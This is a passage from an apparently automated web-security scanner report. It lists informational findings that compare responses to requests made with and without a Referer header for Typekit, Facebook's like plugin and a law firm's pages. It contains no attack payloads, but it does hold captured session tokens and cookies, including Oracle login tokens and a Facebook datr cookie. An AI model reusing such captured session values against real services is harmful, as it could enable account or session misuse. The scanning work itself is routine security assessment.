OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

site2pstoretoken=v1.4%7E40F0BA36%7E0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 06 Sep 2011 16:14:47 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: 0
Set-Cookie: ORA_UCM_VER=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Set-Cookie: ORA_UCM_SRVC=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-ORACLE-DMS-ECID: 0000J8zXJTh6uHK6EVADUS1EHWFB01t_mg
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:47 GMT; path=/
Content-Length: 13718

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html
...[SNIP]...
<a href=" https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx
" class="SignupLink">Sign Up</a> for a free Oracle Web account
</div>
<div class="HelpInst"><a href=" http://www.oracle.com/us/corporate/contact/manage-your-account-070504.html
" class="HelpInstlink"> Need Help?
</a></div>
</div>
</div>
<div class="gb-b"><span class="gb-b-l"></span><span class="gb-b-r"></span></div>
</div>
<div class="pwrdbytxt"> Powered by Oracle Access Manager 11g
</div>
</div>
<div class="footer-info"><div> This site is intended solely for use by Oracle's authorized users. Use of this site is subject to the Legal Notices, Terms for Use and Privacy Statement located on this site. Use of the site by customers and partners, if authorized, is also subject to the terms of your contract(s) with Oracle. Use of this site by Oracle employees is also subject to company policies, including the Code of Conduct. Unauthorized access or breach of these terms may result in termination of your authorization to use this site and/or civil and criminal penalties.
</div></div>
</div>
</div>
<div class="t-b">
<span class="tb-l-corner"></span>
<span class="tb-r-corner"></span>
</div>
</div>
<div>
<div class="footer-content">
<a href=" http://www.oracle.com/us/corporate/index.html
" class="footer-tagline"> Hardware and Software. Engineered to work together
</a>
</div>
<div class="footer-legalnote-container">
<span class="legalese"> <a href=" http://www.oracle.com/us/corporate/index.html
">About Oracle</a> |
<a href=" http://www.oracle.com/us/corporate/contact/index.htm
">Contact Us</a> |
<a href=" http://www.oracle.com/us/legal/index.html
">Legal Notices and Terms of Use</a> |
<a href=" http://www.oracle.com/us/legal/privacy/index.html
">Privacy Policy</a>
</span>
</div>
</div>
</div>
<div class="Mwrapper" div="mobile_content_id">
<div class="Mlogo-header">
<a href=" http://www.oracle.com/index.html
" class="Mlogolink" tabindex=1><img src="/mysso/sso_loginui/ip-o-logo.gif" alt="Oracle"/></a>
</div>
<div class="Mgb-m">

...[SNIP]...

17.5. http://use.typekit.com/k/ghj6ovz-d.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://use.typekit.com
Path:	/k/ghj6ovz-d.css

Request 1

GET /k/ghj6ovz-d.css?3bb2a6e53c9684ffdc9a9afe135b2a62d0c5cfebd5c62bc6cb5953dcc9ca04fb597b7e6e2ad3fdc6e36d4a13bd5d9d37c660a1b5bd1f9d15d65cc5dad650b9578ee036f96df833257eb13365974f27fe5ca4a0c12d081e4cc3 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/tour
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/css
Date: Tue, 06 Sep 2011 15:33:57 GMT
ETag: "47560735+gzip"
Expires: Tue, 06 Sep 2011 15:38:57 GMT
Last-Modified: Wed, 31 Aug 2011 18:28:25 GMT
Server: ECS (sjo/5228)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 229249

/*{"mac":"1:8babe3829692f100b3e2b6a0768ccb884267a6213722f815194773da54ab2b25","version":"5786697","created":"2011-08-31T18:28:31Z","k":"0.9.13"}*/
/*
* The fonts and font delivery service used on this website are provided via
* Typekit, and are subject to the End User License Agreement entered into by
* the website owner. All other parties are explicitly restricted from using,
* in any manner, the Services, Licensed Fonts, or Licensed Content. Details
* about using Typekit, the EULA, and information about the fonts are listed
* below.
*
* @name Droid Sans
* @vendorname Google Android
* @vendorurl http://www.android.com/
* @licenseurl http://typekit.com/fonts/48dc114a2a/eula
*
* @name Myriad Pro
* @vendorname Adobe
* @vendorurl http://www.adobe.com/type/
* @licenseurl http://typekit.com/fonts/8e02145c28/eula
*
* @name Myriad Pro Semi Condensed
* @vendorname Adobe
* @vendorurl http://www.adobe.com/type/
* @licenseurl http://typekit.com/fonts/1bc23aa081/eula
*
* (c) 2011 Typekit, Inc.
*/

@font-face {
font-family:"droid-sans-1";
src:url(data:font/opentype;base64,d09GRgABAAAAAGdkABEAAAAAo5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAABnSAAAABwAAAAcS+Q77EdQT1MAAGB0AAAG0wAAEw6RZcf4R1NVQgAAYDwAAAA4AAAAUJM8gktPUy8yAAAB9AAAAF4AAABgn4K2R2NtYXAAAARQAAABWQAAAZouOcoUY3Z0IAAADEwAAAETAAACADnWQtFmcGdtAAAFrAAABDcAAAcFc9MjsGdhc3AAAGAwAAAADAAAAAwABAAHZ2x5ZgAADwQAAE4lAAB23Lm2TXZoZWFkAAABgAAAADEAAAA2+aldXmhoZWEAAAG0AAAAIAAAACQOZgahaG10eAAAAlQAAAH5AAADRGRFVB1sb2NhAAANYAAAAaQAAAGk7AMLjm1heHAAAAHUAAAAIAAAACADZgHPbmFtZQAAXSwAAAGYAAAC4gjSgY5wb3N0AABexAAAAWwAAAHjeb1i2HByZXAAAAnkAAACZgAAAt07+e6peNpjYGRgYADi9Vwf7OP5bb4yyHMwgMDJA5y5MPq/xz8R9nXsxUAuBwMTSBQANhoLQQAAAHjaY
...[SNIP]...

Request 2

GET /k/ghj6ovz-d.css?3bb2a6e53c9684ffdc9a9afe135b2a62d0c5cfebd5c62bc6cb5953dcc9ca04fb597b7e6e2ad3fdc6e36d4a13bd5d9d37c660a1b5bd1f9d15d65cc5dad650b9578ee036f96df833257eb13365974f27fe5ca4a0c12d081e4cc3 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 403 Forbidden
Cache-Control: max-age=300
Content-Type: text/html
Date: Tue, 06 Sep 2011 15:34:02 GMT
Expires: Tue, 06 Sep 2011 15:39:02 GMT
Server: ECS (sjo/5228)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>403 - Forbidden</title>
   </head>
   <body>
       <h1>403 - Forbidden</h1>
   </body>
</html>

17.6. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?action=recommend&api_key=57345927025&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10f1711d%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.13.37
X-Cnection: close
Date: Tue, 06 Sep 2011 15:33:02 GMT
Content-Length: 32207

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e663d2e3f3cf4137348376" class="connect_widget" style="font-family: "arial", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You recommend <b>Why Oracle Bought E-Commerce Company ATG</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 6 others recommend this.</span><span class="connect_widget_not_connected_text">6 recommendations. <a href="/campaign/landing.php?campaign_id=137675572948107&partner_id=readwriteweb.com&placement=like_button&extra_1=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&extra_2=US" target="_blank">Sign Up</a> to see what your friends recommend.</span><span class="unlike_sp
...[SNIP]...

Request 2

GET /plugins/like.php?action=recommend&api_key=57345927025&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10f1711d%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.255.58
X-Cnection: close
Date: Tue, 06 Sep 2011 15:33:10 GMT
Content-Length: 32045

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e663d361be367684251565" class="connect_widget" style="font-family: "arial", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You recommend <b>Why Oracle Bought E-Commerce Company ATG</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 6 others recommend this.</span><span class="connect_widget_not_connected_text">6 recommendations. <a href="/campaign/landing.php?campaign_id=137675572948107&partner_id&placement=like_button&extra_2=US" target="_blank">Sign Up</a> to see what your friends recommend.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_sp
...[SNIP]...

17.7. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.harbottle.com
Path:	/hnl/pages/article_view_hnl/1689.php

Request 1

GET /hnl/pages/article_view_hnl/1689.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:41 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 35226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
<UL class=box-menu>
<LI><A href="javascript:history.back()">Back to list</A></LI></UL>
<A name=index>
<TABLE cellSpacing=0 cellPadding=0 width=600 border=0>
<STYLE>
body,div,td,p,ul,li,a {font-family:Arial; font-size:12px; color:black}
a {color:#333399}
ul,li {margin: 0px 0px 0px 8px; padding: 0px 0px 0px 8px;}
p {margin-top:0; margin-bottom:0.5m}
.contents {font-size:13px; color:#FF9933; font-weight:bold; text-decoration:none}
.headline {color:#6699CC; font-weight:bold; margin-top:1em; margin-bottom:0.5em}
hr {color:#FF9933}
.section {font-size:14px; color:#FF9933; font-weight:bold; margin-top:0.5em; margin-bottom:0.5em}
hr {color:#FF9933}
.contacts {font-size:12px; color:#333399}
.disclaimer {font-size:11.5px; color:#999999}
</STYLE>

<TBODY>
<TR vAlign=top>
<TD rowSpan=6><IMG height=1 src="pix/clear.gif" width=34 was="20"></TD>
<TD align=right><IMG src="pix/newsletters/ESportsMasthead.jpg" width=566> </TD></TR>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%">
<TBODY>
<TR>
<TD colSpan=2><IMG height=4 src="pix/clear.gif" width=1></TD></TR>
<TR vAlign=center>
<TD><IMG height=1 src="pix/clear.gif" width=35><SPAN class=headline>March 2005</SPAN><BR></TD>
<TD align=right><IMG src="pix/newsletters/50th_logo.jpg"></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%">
<TBODY>
<TR>
<TD vAlign=top width="48%">
<TABLE cellSpacing=0 cellPadding=0>
<TBODY>
<TR vAlign=top>
<TD vAlign=top width=13><IMG src="pix/square_FF9933.gif" border=0></TD>
<TD vAlign=top><A class=contents href="pages/article_view_hnl/1689.php#A146">A novel way of tackling ambush marketing</A></TD></TR>
<TR class=shade vAlign=top>
<TD vAlign=top width=13><IMG src="pix/square_FF9933.gif" border=0></TD>
<TD vAlign=top><A class=con
...[SNIP]...

Request 2

GET /hnl/pages/article_view_hnl/1689.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:02 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 35139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</h1>

<A name=index>
<TABLE cellSpacing=0 cellPadding=0 width=600 border=0>
<STYLE>
body,div,td,p,ul,li,a {font-family:Arial; font-size:12px; color:black}
a {color:#333399}
ul,li {margin: 0px 0px 0px 8px; padding: 0px 0px 0px 8px;}
p {margin-top:0; margin-bottom:0.5m}
.contents {font-size:13px; color:#FF9933; font-weight:bold; text-decoration:none}
.headline {color:#6699CC; font-weight:bold; margin-top:1em; margin-bottom:0.5em}
hr {color:#FF9933}
.section {font-size:14px; color:#FF9933; font-weight:bold; margin-top:0.5em; margin-bottom:0.5em}
hr {color:#FF9933}
.contacts {font-size:12px; color:#333399}
.disclaimer {font-size:11.5px; color:#999999}
</STYLE>

<TBODY>
<TR vAlign=top>
<TD rowSpan=6><IMG height=1 src="pix/clear.gif" width=34 was="20"></TD>
<TD align=right><IMG src="pix/newsletters/ESportsMasthead.jpg" width=566> </TD></TR>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%">
<TBODY>
<TR>
<TD colSpan=2><IMG height=4 src="pix/clear.gif" width=1></TD></TR>
<TR vAlign=center>
<TD><IMG height=1 src="pix/clear.gif" width=35><SPAN class=headline>March 2005</SPAN><BR></TD>
<TD align=right><IMG src="pix/newsletters/50th_logo.jpg"></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%">
<TBODY>
<TR>
<TD vAlign=top width="48%">
<TABLE cellSpacing=0 cellPadding=0>
<TBODY>
<TR vAlign=top>
<TD vAlign=top width=13><IMG src="pix/square_FF9933.gif" border=0></TD>
<TD vAlign=top><A class=contents href="pages/article_view_hnl/1689.php#A146">A novel way of tackling ambush marketing</A></TD></TR>
<TR class=shade vAlign=top>
<TD vAlign=top width=13><IMG src="pix/square_FF9933.gif" border=0></TD>
<TD vAlign=top><A class=contents href="pages/article_view_hnl/1689.php#A145">Dispute in football about use of pho
...[SNIP]...

17.8. http://www.harbottle.com/hnl/pages/articles/direct_beauty_products_trimsole.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.harbottle.com
Path:	/hnl/pages/articles/direct_beauty_products_trimsole.php

Request 1

GET /hnl/pages/articles/direct_beauty_products_trimsole.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/pubs/479
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 15628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
<UL class=box-menu>
<LI><A href="javascript:history.back()">Back to list</A></LI></UL>
<P>Harbottle & Lewis has advised Direct Beauty Products, one of the country...s largest independent suppliers of premium beauty products, on the commercial arrangements for its new product TrimSole.. Footwear.</P>
<P>Endorsed by TV star Amanda Holden, TrimSole.. is a range of toning footwear, and has established a dedicated legion of customers since its launch in 2010. Toning footwear is the fastest growing segment in the footwear industry. </P>
<P>Simon Gook, MD said, ...<EM>I am delighted to have Harbottle & Lewis representing TrimSole... The next few years will see TrimSole.. expand into overseas markets and we are looking forward to a very exciting period of further growth for the brand</EM>....<BR></P></p>
 </div>
<div class="side-column">
<div class="highlights box">
<h2>Site Highlights</h2>
<ul>

<li><h3><a href="pages/articles/direct_beauty_products_trimsole.php"><span>05 Aug 11</span></a>
<strong>Press Release</strong></h3>
<p>Harbottle & Lewis Advise Direct Beauty Products on TrimSole.. Footwear</p></li>
<li><h3><a href="pages/articles/redkite_financial_markets_investment_dfj_esprit.php"><span>29 Jul 11</span></a>
<strong>Press Release</strong></h3>
<p>Harbottle & Lewis Advise Redkite Financial Markets on Investment From DFJ Esprit</p></li>




<li><h3><a href="pages/article_view_hnl/9733.php"><span>19 May 11</span></a>
<strong>Article</strong></h3>
<p>Interflora v Marks & Spencer - the Impact on IP, Competitiveness and Advertising</p></li>

</ul> </div>


</div>
</div>
</div>

...[SNIP]...

Request 2

GET /hnl/pages/articles/direct_beauty_products_trimsole.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:03 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 15541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</h1>

<P>Harbottle & Lewis has advised Direct Beauty Products, one of the country...s largest independent suppliers of premium beauty products, on the commercial arrangements for its new product TrimSole.. Footwear.</P>
<P>Endorsed by TV star Amanda Holden, TrimSole.. is a range of toning footwear, and has established a dedicated legion of customers since its launch in 2010. Toning footwear is the fastest growing segment in the footwear industry. </P>
